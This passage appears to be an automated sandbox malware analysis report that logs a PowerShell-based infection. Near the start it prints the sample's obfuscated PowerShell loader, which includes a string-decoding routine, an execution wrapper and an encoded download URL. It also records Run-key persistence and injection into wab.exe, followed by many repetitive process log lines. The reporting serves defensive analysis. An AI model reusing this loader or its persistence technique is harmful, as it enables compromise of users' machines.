UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_042529E3 push cs; ret 5_2_042529EA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_042534C7 push eax; retf 5_2_042534D1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0425B8E0 push eax; iretd 5_2_0425B8E1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0715100A push eax; mov dword ptr [esp], ecx5_2_0715120C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07151200 push eax; mov dword ptr [esp], ecx5_2_0715120C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C309C4 push es; ret 10_3_08C30A2E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C339CC push es; ret 10_3_08C33A36
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C3089F push cs; retf 10_3_08C308A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C338A7 push cs; retf 10_3_08C338A8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C365AB push cs; retf 10_3_08C365AC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C35CAD push cs; retf 10_3_08C35CAE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C30377 push cs; iretd 10_3_08C30378
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C3337F push cs; iretd 10_3_08C33380
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C31413 push es; retf 10_3_08C31414
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C3441B push es; retf 10_3_08C3441C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A11FEC push eax; iretd 10_2_24A11FED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A127FA pushad ; ret 10_2_24A127F9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A19939 push es; iretd 10_2_24A19940
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A1283D push eax; iretd 10_2_24A12858
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A1B008 push es; iretd 10_2_24A1B009
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A1225F pushad ; ret 10_2_24A127F9
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ScleroconjunctivalJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ScleroconjunctivalJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
